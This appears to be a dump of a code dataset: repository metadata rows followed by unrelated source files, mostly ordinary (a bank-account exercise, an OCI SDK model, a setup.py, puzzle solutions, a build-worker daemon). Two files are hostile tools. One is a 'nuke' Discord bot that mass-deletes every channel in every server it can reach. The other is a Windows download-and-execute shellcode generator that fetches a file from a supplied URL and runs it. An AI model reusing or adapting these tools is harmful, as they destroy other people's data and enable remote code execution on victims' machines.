hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795512f209b60bc171b0325ca60273e1b3c8c348 | 2,807 | py | Python | class12pythoncbse-master/Chapter 5/Question2.py | SubrataSarkar32/college3rdsem3035 | 5cb501d0bf3742029121076cb7a2affa97d2a13b | [
"Apache-2.0"
] | null | null | null | class12pythoncbse-master/Chapter 5/Question2.py | SubrataSarkar32/college3rdsem3035 | 5cb501d0bf3742029121076cb7a2affa97d2a13b | [
"Apache-2.0"
] | null | null | null | class12pythoncbse-master/Chapter 5/Question2.py | SubrataSarkar32/college3rdsem3035 | 5cb501d0bf3742029121076cb7a2affa97d2a13b | [
"Apache-2.0"
] | null | null | null | class Account:
def __init__(self,custn,accno,opba):
self.custn=custn
self.accno=accno
self.opba=opba
self.aopen=opba
class Current(Account):
def __init__(self):
custname=raw_input('Enter customer name: ')
accno=input('Enter customer account number: ')
opba=input('Enter customer open balance: ')
Account.__init__(self,custname,accno,opba)
self.minba=input('Enter minimum required balance: ')
def deposit(self,deposit=0):
self.opba+=deposit
def check(self):
if self.opba<self.minba:
print 'Imposing penalty','Low balance!'
self.opba=self.opba-(self.minba-self.opba)
return True
else:
return False
def withdraw(self,withdraw):
k=self.check()
if k:
print 'Withdraw not possible'
else:
if self.opba-withdraw>=self.minba:
self.opba-=withdraw
print 'Withdrawn',withdraw
else:
print 'After withdrawal your balance is below minimum balance\
so you are imposable for penalty.'
self.opba-=withdraw
print 'Withdrawn',withdraw
l=self.check()
def display(self):
print 'Here is your acount details:'
print 'Customer name: ',self.custn
print 'Acccount No.: ',self.accno
print 'Current Balance: ',self.opba
print 'Open Balance: ',self.aopen
print 'Set minimum required balance: ',self.minba
class Savings(Account):
def __init__(self):
custname=raw_input('Enter customer name: ')
accno=input('Enter customer acount number: ')
opba=float(input('Enter customer open balance: '))
Account.__init__(self,custname,accno,opba)
self.cir=input('Enter compound interest rate: ')
def deposit(self,deposit=0):
self.opba+=deposit
def interest(self):
time=input('Enter time of interest:')
self.opba=(self.opba)*((1+self.cir/100.0)**time)
def withdraw(self,withdraw):
if self.opba-withdraw>=0:
self.opba-=withdraw
print 'Withdrawn',withdraw
else:
print 'Withdraw not possible'
def display(self):
print 'Here is your acount details:'
print 'Customer name: ',self.custn
print 'Acccount No.: ',self.accno
print 'Current Balance: ',self.opba
print 'Open Balance: ',self.aopen
print 'Set compound interest (annual): ',self.cir
#main
a=Current()
a.deposit()
a.check()
bac=input('Enter amount to withdraw')
a.withdraw(bac)
a.display()
b=Savings()
b.deposit()
b.interest()
b.display()
bac=input('Enter amount to withdraw')
b.withdraw(bac)
b.display()
| 32.639535 | 78 | 0.598147 |
7955134bc098c2d1bd913177f240789ebb8a6a73 | 6,736 | py | Python | src/oci/cloud_guard/models/update_security_recipe_details.py | pabs3/oci-python-sdk | 437ba18ce39af2d1090e277c4bb8750c89f83021 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/cloud_guard/models/update_security_recipe_details.py | pabs3/oci-python-sdk | 437ba18ce39af2d1090e277c4bb8750c89f83021 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/cloud_guard/models/update_security_recipe_details.py | pabs3/oci-python-sdk | 437ba18ce39af2d1090e277c4bb8750c89f83021 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateSecurityRecipeDetails(object):
"""
Information to update in an existing security zone recipe
"""
def __init__(self, **kwargs):
"""
Initializes a new UpdateSecurityRecipeDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param display_name:
The value to assign to the display_name property of this UpdateSecurityRecipeDetails.
:type display_name: str
:param description:
The value to assign to the description property of this UpdateSecurityRecipeDetails.
:type description: str
:param security_policies:
The value to assign to the security_policies property of this UpdateSecurityRecipeDetails.
:type security_policies: list[str]
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateSecurityRecipeDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this UpdateSecurityRecipeDetails.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'display_name': 'str',
'description': 'str',
'security_policies': 'list[str]',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))'
}
self.attribute_map = {
'display_name': 'displayName',
'description': 'description',
'security_policies': 'securityPolicies',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags'
}
self._display_name = None
self._description = None
self._security_policies = None
self._freeform_tags = None
self._defined_tags = None
@property
def display_name(self):
"""
**[Required]** Gets the display_name of this UpdateSecurityRecipeDetails.
The recipe's name
:return: The display_name of this UpdateSecurityRecipeDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this UpdateSecurityRecipeDetails.
The recipe's name
:param display_name: The display_name of this UpdateSecurityRecipeDetails.
:type: str
"""
self._display_name = display_name
@property
def description(self):
"""
Gets the description of this UpdateSecurityRecipeDetails.
The recipe's description
:return: The description of this UpdateSecurityRecipeDetails.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this UpdateSecurityRecipeDetails.
The recipe's description
:param description: The description of this UpdateSecurityRecipeDetails.
:type: str
"""
self._description = description
@property
def security_policies(self):
"""
Gets the security_policies of this UpdateSecurityRecipeDetails.
The list of `SecurityPolicy` ids to include in the recipe
:return: The security_policies of this UpdateSecurityRecipeDetails.
:rtype: list[str]
"""
return self._security_policies
@security_policies.setter
def security_policies(self, security_policies):
"""
Sets the security_policies of this UpdateSecurityRecipeDetails.
The list of `SecurityPolicy` ids to include in the recipe
:param security_policies: The security_policies of this UpdateSecurityRecipeDetails.
:type: list[str]
"""
self._security_policies = security_policies
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this UpdateSecurityRecipeDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
Avoid entering confidential information.
:return: The freeform_tags of this UpdateSecurityRecipeDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this UpdateSecurityRecipeDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
Avoid entering confidential information.
:param freeform_tags: The freeform_tags of this UpdateSecurityRecipeDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this UpdateSecurityRecipeDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:return: The defined_tags of this UpdateSecurityRecipeDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this UpdateSecurityRecipeDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:param defined_tags: The defined_tags of this UpdateSecurityRecipeDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 33.182266 | 245 | 0.658254 |
795514397302ff659db956bc26c7e2e2a46ac642 | 6,101 | py | Python | main.py | Videro1407/nuke-bot | 4b327bdebab6993cb332cc295073dd8e67a93ce0 | [
"MIT"
] | 5 | 2021-02-17T14:56:38.000Z | 2022-02-28T01:58:03.000Z | main.py | Videro1407/nuke-bot | 4b327bdebab6993cb332cc295073dd8e67a93ce0 | [
"MIT"
] | null | null | null | main.py | Videro1407/nuke-bot | 4b327bdebab6993cb332cc295073dd8e67a93ce0 | [
"MIT"
] | 4 | 2021-04-10T11:52:22.000Z | 2022-02-26T15:02:15.000Z | # -*- coding: utf-8 -*-
"""
- Usage of this bot is not at all recommended as its against the Terms of Service of discord.
- Your account may get banned if you use this bot.
- You can still make an alt account if you are that desperate.
- The bot requires `Manage Channels` permission in every server.
- Deletes (or at least tries to) delete all the channels accessible to the bot.
- Use this at your own risk.
- Channels once deleted cannot come back.
- Made strictly for educational purposes only.
- I won't be responsible for any stupid things which any of you might not / might do.
"""
# imports
import json
import sys
from colorama import Fore, Style
import discord
import asyncio as aio
import random as rd
from discord.ext import commands as NukeBot
# set up the bot
it = discord.Intents.default() # privileged intents are not really required
bot = NukeBot.Bot(command_prefix="!", intents=it, chunk_guilds_at_startup=False) # the main Bot instance
# other stuff
intro = f"""- USE THIS AT YOUR OWN RISK. Read this for full info: https://github.com/Videro1407/nuke-bot/blob/main/README.md
- Made strictly for educational purposes by @Videro1407: https://linktr.ee/videro
- I won't be responsible for any stupid things which any of you might not / might do."""
NukeBotHitFont = """
███╗░░██╗██╗░░░██╗██╗░░██╗███████╗ ██████╗░░█████╗░████████╗
████╗░██║██║░░░██║██║░██╔╝██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝
██╔██╗██║██║░░░██║█████═╝░█████╗░░ ██████╦╝██║░░██║░░░██║░░░
██║╚████║██║░░░██║██╔═██╗░██╔══╝░░ ██╔══██╗██║░░██║░░░██║░░░
██║░╚███║╚██████╔╝██║░╚██╗███████╗ ██████╦╝╚█████╔╝░░░██║░░░
╚═╝░░╚══╝░╚═════╝░╚═╝░░╚═╝╚══════╝ ╚═════╝░░╚════╝░░░░╚═╝░░░"""
# print the info
print(Fore.RED + Style.BRIGHT + NukeBotHitFont)
print(Fore.GREEN + Style.BRIGHT + intro)
# config load
config = json.loads(open('config.json', 'r').read())
# speed config
Time = 5
speed = input(Fore.BLUE + Style.BRIGHT + f"At what speed do you want to nuke the channels?\n"
f"Options available: slow, medium, fast, insane\n")
if speed.lower() == 'slow':
Time = 10
elif speed.lower() == 'medium':
Time = 5
elif speed.lower() == 'fast':
Time = 3
elif speed.lower() == 'insane':
Time = 1
elif speed.lower() == 'godly': # lil' easter egg
Time = 1 / 2
elif int(speed) == 1:
Time = 10
elif int(speed) == 2:
Time = 5
elif int(speed) == 3:
Time = 3
elif int(speed) == 4:
Time = 1
elif int(speed) == 5: # lil' easter egg
Time = 1 / 2
else:
print(f'Invalid speed entered, default speed selected.')
Time = 5
print(f"Speed: 1 channel per {Time} second{'s' if Time > 1 else ''}")
# logging in message
print(f"Bot is logging in...")
async def NukeAllChannels(): # main task
gone = 0 # number of channels deleted
not_gone = 0 # number of channels which could not be deleted
while True: # while loop
try:
await bot.wait_until_ready() # wait till the bot is ready and logged in
if len(list(bot.get_all_channels())) == 0: # if there are no channels
print(Fore.RED+Style.BRIGHT+f"[NO CHANNELS]: The bot `{str(bot.user)}` has access to no channels.")
sys.exit() # exit the script
r1 = rd.randint(1, 10) # random number from 1 to 10
if r1 == 5: # this will be displayed randomly
print(f'Total channels discovered: {gone + not_gone} channels\n'
f'Total channels deleted: {gone} channels')
for channel in bot.get_all_channels(): # get all the abc.GuildChannels
await aio.sleep(Time) # speed of deleting the channels
try:
await channel.delete(reason=f"Nuke Bot") # delete the channel
print(Fore.GREEN + Style.BRIGHT + f"[SUCCESS]: Deleted {channel.name} ({channel.id}).\n"
f" Guild: {channel.guild.name} ({channel.guild.id})\n"
f" Total Channels Deleted: {gone}") # print it
gone += 1 # add 1 to `gone`
except Exception as e: # error handling
if isinstance(e, discord.Forbidden): # the bto does not have perms to delete the channel
not_gone += 1 # add 1 to `not_gone`
print(Fore.RED+Style.BRIGHT+f'[MISSING ACCESS]: Could not delete {channel.name} ({channel.id})\n'
f' Guild: {channel.guild.name} ({channel.guild.id})\n'
f' Channels not deleted: {not_gone}') # print it
pass # pass/ignore the exception
else: # any unknown error
not_gone += 1 # add 1 to `not_gone`
print(Fore.RED+Style.BRIGHT+f'[OTHER ERROR]: Could not delete {channel.name} ({channel.id})\n'
f' Guild: {channel.guild.name} ({channel.guild.id})\n'
f' Channels not deleted: {not_gone}') # print it
pass # pass/ignore the exception
except RuntimeError: # Tried to do this but it didn't quite work
print(Fore.GREEN + Style.BRIGHT + f"Try inviting the bot into other servers.")
@bot.event # event decorator
async def on_ready(): # when the bot has logged in and is ready to go
print(Fore.GREEN + Style.BRIGHT + f"Logged in as {str(bot.user)} ({bot.user.id})") # print that we are ready
await aio.sleep(0.5) # little delay before the next print
all_channels = len(list(bot.get_all_channels()))
print(Fore.GREEN + Style.BRIGHT + f"Starting nuking channels..\n"
f"Total Channels Accessible: {all_channels}") # print the channels accessible
bot.loop.create_task(NukeAllChannels()) # create the task here
bot.run(config['BOT_TOKEN']) # run the bot (connect + login)
| 47.294574 | 124 | 0.556466 |
7955144ef8586cd58e0b4b975da9f9f5849f5385 | 1,927 | py | Python | setup.py | gebn/chandl | 0518207e66c0dfb9c64e34b41d45e87b701437bd | [
"MIT"
] | 5 | 2017-02-02T21:07:51.000Z | 2021-02-16T18:34:16.000Z | setup.py | gebn/chandl | 0518207e66c0dfb9c64e34b41d45e87b701437bd | [
"MIT"
] | 14 | 2016-11-29T00:36:04.000Z | 2018-04-05T20:09:02.000Z | setup.py | gebn/chandl | 0518207e66c0dfb9c64e34b41d45e87b701437bd | [
"MIT"
] | 1 | 2017-02-02T21:07:38.000Z | 2017-02-02T21:07:38.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from setuptools import setup, find_packages
import codecs
import chandl
def _read_file(name, encoding='utf-8'):
"""
Read the contents of a file.
:param name: The name of the file in the current directory.
:param encoding: The encoding of the file; defaults to utf-8.
:return: The contents of the file.
"""
with codecs.open(name, encoding=encoding) as f:
return f.read()
setup(
name='chandl',
version=chandl.__version__,
description='A lightweight tool for parsing and downloading 4chan threads.',
long_description=_read_file('README.rst'),
license='MIT',
url='https://github.com/gebn/chandl',
author='George Brighton',
author_email='oss@gebn.co.uk',
packages=find_packages(),
install_requires=[
'six>=1.9.0',
'Unidecode',
'bleach',
'requests',
'httmock',
'progress',
'pytz',
'pyfakefs'
],
test_suite='nose.collector',
tests_require=[
'nose'
],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Software Development :: Libraries :: Python Modules'
],
entry_points={
'console_scripts': [
'chandl = chandl.__main__:main_cli',
]
}
)
| 28.338235 | 80 | 0.594707 |
7955147a7382577cd1e4eae4e819330640885547 | 723 | py | Python | 8_Cloudrip_Mountain/440-Resource_Valleys/resource_valley.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 8_Cloudrip_Mountain/440-Resource_Valleys/resource_valley.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | 8_Cloudrip_Mountain/440-Resource_Valleys/resource_valley.py | katitek/Code-Combat | fbda1ac0ae4a2e2cbfce21492a2caec8098f1bef | [
"MIT"
] | null | null | null | def commandPeasant(peasant, coins):
coin = peasant.findNearest(coins)
if coin:
hero.command(peasant, "move", coin.pos)
friends = hero.findFriends()
peasants = {
"Aurum": friends[0],
"Argentum":friends[1],
"Cuprum":friends[2]
}
while True:
items = hero.findItems()
goldCoins = [];
silverCoins = [];
bronzeCoins = [];
for item in items:
if item.value == 3:
goldCoins.push(item)
elif item.value == 2:
silverCoins.push(item)
elif item.value == 1:
bronzeCoins.push(item)
commandPeasant(peasants.Aurum, goldCoins)
commandPeasant(peasants.Argentum, silverCoins)
commandPeasant(peasants.Cuprum, bronzeCoins)
| 24.931034 | 50 | 0.618257 |
795514803fcf962e8a3da1e0ce1ddb9532605ffe | 106 | py | Python | yc154/445.py | c-yan/yukicoder | cdbbd65402177225dd989df7fe01f67908484a69 | [
"MIT"
] | null | null | null | yc154/445.py | c-yan/yukicoder | cdbbd65402177225dd989df7fe01f67908484a69 | [
"MIT"
] | null | null | null | yc154/445.py | c-yan/yukicoder | cdbbd65402177225dd989df7fe01f67908484a69 | [
"MIT"
] | null | null | null | def f(N, K):
return 50 * N + 500 * N // (8 + 2 * K)
A, B = map(int, input().split())
print(f(A, B))
| 15.142857 | 42 | 0.45283 |
7955151e1396190c6d41fd42bcfc18be1575cf68 | 1,875 | py | Python | shell/database/Windows/downloadandexecute.py | vasco2016/shellsploit-framework | 04eb4a0449acaba0b70c40a78c61a0d5e2527406 | [
"MIT"
] | 61 | 2017-06-13T13:48:38.000Z | 2022-03-02T17:43:45.000Z | shell/database/Windows/downloadandexecute.py | security-geeks/shellsploit-framework | 93b66ab9361872697eafda2125b37005f49116be | [
"MIT"
] | null | null | null | shell/database/Windows/downloadandexecute.py | security-geeks/shellsploit-framework | 93b66ab9361872697eafda2125b37005f49116be | [
"MIT"
] | 28 | 2017-08-15T05:38:27.000Z | 2020-12-31T03:39:38.000Z | #https://packetstormsecurity.com/files/119812/Allwin-URLDownloadToFile-WinExec-ExitProcess-Shellcode.html
#Author: RubberDuck
#WORK
def downANDexecute( URL,FILENAME):
shellcode = r"\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B"
shellcode += r"\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53"
shellcode += r"\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72"
shellcode += r"\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81"
shellcode += r"\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04"
shellcode += r"\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64"
shellcode += r"\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3"
shellcode += r"\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3"
shellcode += r"\x8B\x14\x8E\x03\xD3\x33\xC9\x51"
shellcode += FILENAME
shellcode += r"\x53\x52"
shellcode += r"\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62"
shellcode += r"\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2"
shellcode += r"\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C"
shellcode += r"\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C"
shellcode += r"\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24"
shellcode += r"\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33"
shellcode += r"\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64"
shellcode += r"\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C"
shellcode += r"\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24"
shellcode += r"\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83"
shellcode += r"\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68"
shellcode += r"\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57"
shellcode += r"\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D"
shellcode += r"\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A"
shellcode += r"\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03"
shellcode += r"\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69"
shellcode += r"\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF"
shellcode += r"\xFF\xFF"
shellcode += URL
return shellcode
| 46.875 | 105 | 0.666667 |
795515589bd4688da923bb7a753aa2e0741502b1 | 1,348 | py | Python | problems/p008.py | tshralper/tabula-rasa_project-euler | 3eb924ae4a38d877098f6b8f8e1118f8ae3514e2 | [
"MIT"
] | 3 | 2018-08-15T18:50:35.000Z | 2018-08-15T19:04:46.000Z | problems/p008.py | tshralper/tabula-rasa_project-euler | 3eb924ae4a38d877098f6b8f8e1118f8ae3514e2 | [
"MIT"
] | null | null | null | problems/p008.py | tshralper/tabula-rasa_project-euler | 3eb924ae4a38d877098f6b8f8e1118f8ae3514e2 | [
"MIT"
] | 1 | 2018-08-15T18:50:46.000Z | 2018-08-15T18:50:46.000Z | #The four adjacent digits in the 1000-digit number that have
# the greatest product are 9 × 9 × 8 × 9 = 5832.
#
# 73167176531330624919225119674426574742355349194934
# 96983520312774506326239578318016984801869478851843
# 85861560789112949495459501737958331952853208805511
# 12540698747158523863050715693290963295227443043557
# 66896648950445244523161731856403098711121722383113
# 62229893423380308135336276614282806444486645238749
# 30358907296290491560440772390713810515859307960866
# 70172427121883998797908792274921901699720888093776
# 65727333001053367881220235421809751254540594752243
# 52584907711670556013604839586446706324415722155397
# 53697817977846174064955149290862569321978468622482
# 83972241375657056057490261407972968652414535100474
# 82166370484403199890008895243450658541227588666881
# 16427171479924442928230863465674813919123162824586
# 17866458359124566529476545682848912883142607690042
# 24219022671055626321111109370544217506941658960408
# 07198403850962455444362981230987879927244284909188
# 84580156166097919133875499200524063689912560717606
# 05886116467109405077541002256983155200055935729725
# 71636269561882670428252483600823257530420752963450
#
#
#
#Find the thirteen adjacent digits in the 1000-digit
#number that have the greatest product. What is the value
#of this product? | 46.482759 | 61 | 0.875371 |
79551697004dbde40f969c8d977a279af9045eb3 | 7,706 | py | Python | vespene/workers/daemon.py | Conan-Kudo/vespene | 9e9977523f45586e1326ccd77d8cc0cb10591a07 | [
"Apache-2.0"
] | 680 | 2018-10-29T12:12:10.000Z | 2019-04-27T09:52:58.000Z | vespene/workers/daemon.py | Conan-Kudo/vespene | 9e9977523f45586e1326ccd77d8cc0cb10591a07 | [
"Apache-2.0"
] | 110 | 2018-10-29T12:33:34.000Z | 2019-02-14T02:31:43.000Z | vespene/workers/daemon.py | Conan-Kudo/vespene | 9e9977523f45586e1326ccd77d8cc0cb10591a07 | [
"Apache-2.0"
] | 92 | 2018-10-29T12:21:12.000Z | 2019-06-08T11:08:08.000Z | # Copyright 2018, Michael DeHaan LLC
# License: Apache License Version 2.0
# -------------------------------------------------------------------------
# daemon.py - this is the main entry point for each worker process. It
# doesn't fork. The build will periodically check to see if it is flagged
# as one that should be stopped, and if so, will self terminate. Logic
# is mostly in 'builder.py'.
# --------------------------------------------------------------------------
import time
import traceback
from datetime import datetime, timedelta
import sys
from django.db import transaction
from django.utils import timezone
from django.db import DatabaseError
from vespene.common.logger import Logger
from vespene.models.build import (ABORTED, ABORTING, ORPHANED, QUEUED, Build)
from vespene.models.organization import Organization
from vespene.models.worker_pool import WorkerPool
from vespene.workers.builder import BuildLord
from vespene.workers.scheduler import Scheduler
from vespene.workers.importer import ImportManager
LOG = Logger()
FLAG_ABORTED_AFTER_ABORTING_MINUTES = 1
#==============================================================================
class Daemon(object):
"""
Worker main loop.
This doesn't have any daemonization code at the moment, it is expected you would run it from supervisor,
wrapped by ssh-agent
"""
# -------------------------------------------------------------------------
def __init__(self, pool_name, max_wait_minutes=-1, max_builds=-1, build_id=-1):
"""
Create a worker that serves just one queue.
"""
self.pool = pool_name
self.max_wait_minutes = max_wait_minutes
self.build_counter = max_builds
self.reload()
self.ready_to_serve = False
self.time_counter = datetime.now(tz=timezone.utc)
if build_id >= 0:
# If worker is started for one specific build,
# we don't wait and only process one build.
self.max_wait_minutes = -1
self.build_counter = 1
self.build_id = build_id
else:
self.build_id = None
LOG.info("serving queue: %s" % self.pool)
# -------------------------------------------------------------------------
def reload(self):
pools = WorkerPool.objects.filter(name=self.pool)
if pools.count() != 1:
LOG.error("worker pool does not (yet?) exist: %s" % self.pool)
self.pool_obj = None
else:
self.pool_obj = pools.first()
# -------------------------------------------------------------------------
def run(self):
"""
Main loop.
"""
while True:
try:
self.reload()
if self.pool_obj is not None:
self.body()
except Exception:
traceback.print_exc()
finally:
if self.pool_obj is not None:
time.sleep(self.pool_obj.sleep_seconds)
else:
time.sleep(60)
# -------------------------------------------------------------------------
def find_build(self, build_id=None):
if build_id is not None:
try:
return Build.objects.get(pk=self.build_id)
except Build.DoesNotExist:
LOG.debug("no build with id %s, exiting" % str(self.build_id))
sys.exit(1)
else:
# try to run any build queued in the last interval <default: 1 hour>, abort all other builds
threshold = datetime.now(tz=timezone.utc) - timedelta(minutes=self.pool_obj.auto_abort_minutes)
builds = Build.objects.filter(
status = QUEUED,
worker_pool__name = self.pool,
queued_time__gt = threshold
)
count = builds.count()
if count == 0:
return None
first = builds.order_by('id').first()
with transaction.atomic():
try:
first = Build.objects.select_for_update(nowait=True).get(id=first.pk)
except DatabaseError:
return None
if count > 1 and self.pool_obj.build_latest:
self.cleanup_extra_builds(first)
return first
# -------------------------------------------------------------------------
def cleanup_extra_builds(self, first):
rest = Build.objects.filter(
status = QUEUED,
project = first.project
).exclude(
id = first.pk
)
rest.update(status=ABORTED)
# -------------------------------------------------------------------------
def cleanup_orphaned_builds(self):
# builds that are queued for too long...
threshold = datetime.now(tz=timezone.utc) - timedelta(minutes=self.pool_obj.auto_abort_minutes)
orphaned = Build.objects.filter(
status=QUEUED,
project__worker_pool__name = self.pool,
queued_time__lt = threshold
)
for orphan in orphaned.all():
LOG.warn("build %s was in queued status too long and not picked up by another worker, flagging as orphaned" % orphan.id)
orphaned.update(status=ORPHANED)
# builds that haven't been aborted in too long for ANY worker pool
threshold = datetime.now(tz=timezone.utc) - timedelta(minutes=FLAG_ABORTED_AFTER_ABORTING_MINUTES)
orphaned = Build.objects.filter(
status=ABORTING,
queued_time__lt = threshold
)
for orphan in orphaned.all():
LOG.warn("build %s was in aborting status too long, assuming successfully aborted" % orphan.id)
orphaned.update(status=ABORTED)
# -------------------------------------------------------------------------
def import_organizations(self):
organizations = Organization.objects.filter(import_enabled=True, worker_pool=self.pool_obj)
for org in organizations:
with transaction.atomic():
try:
org = organizations.select_for_update(nowait=True).get(pk=org.pk)
repo_importer = ImportManager(org)
repo_importer.do_import()
org.save()
except DatabaseError:
traceback.print_exc()
# -------------------------------------------------------------------------
def schedule_builds(self):
Scheduler().go()
# -------------------------------------------------------------------------
def body(self):
"""
Main block, all exceptions are caught.
"""
self.import_organizations()
self.cleanup_orphaned_builds()
self.schedule_builds()
build = self.find_build(build_id=self.build_id)
if build:
self.time_counter = datetime.now(tz=timezone.utc)
LOG.debug("building: %d, project: %s" % (build.id, build.project.name))
BuildLord(build).go()
self.build_counter = self.build_counter - 1
if self.build_counter == 0:
LOG.debug("requested max build count per worker limit reached, exiting")
sys.exit(0)
else:
now = datetime.now(tz=timezone.utc)
delta = now - self.time_counter
if (self.max_wait_minutes > 0) and (delta.total_seconds() * 60 > self.max_wait_minutes):
LOG.debug("no build has occured in %s minutes, exiting" % self.max_wait_minutes)
sys.exit(0)
| 35.675926 | 132 | 0.522969 |
795516a21bc2d4bd31c9e1552ab0cbb2fe374c8a | 1,755 | py | Python | models/MatrixFct.py | Rigel-Everlasting/ID2211DataMining | 44f6038fee91a124a5f1ebed4d100fae2af2ec0e | [
"MIT"
] | null | null | null | models/MatrixFct.py | Rigel-Everlasting/ID2211DataMining | 44f6038fee91a124a5f1ebed4d100fae2af2ec0e | [
"MIT"
] | null | null | null | models/MatrixFct.py | Rigel-Everlasting/ID2211DataMining | 44f6038fee91a124a5f1ebed4d100fae2af2ec0e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @author: JamieJ
# @license: Apache Licence
# @file: MatrixFct.py
# @time: 2021/05/10
# @contact: mingj@kth,se
# @software: PyCharm
# May the Force be with you.
from Data import *
import numpy as np
from scipy.sparse import coo_matrix
from scipy import sparse
from torch.nn import Module
import torch.nn as nn
import torch
import torch.nn.functional as F
class biasSVD(Module):
# matrix factorization through the embedding layer of pytorch
# SVD with bias on users and items
# users bias: the rating habits of users
# item bias: the overall rating unrelated to users
def __init__(self, user_num, item_num, embed_size):
super(biasSVD, self).__init__()
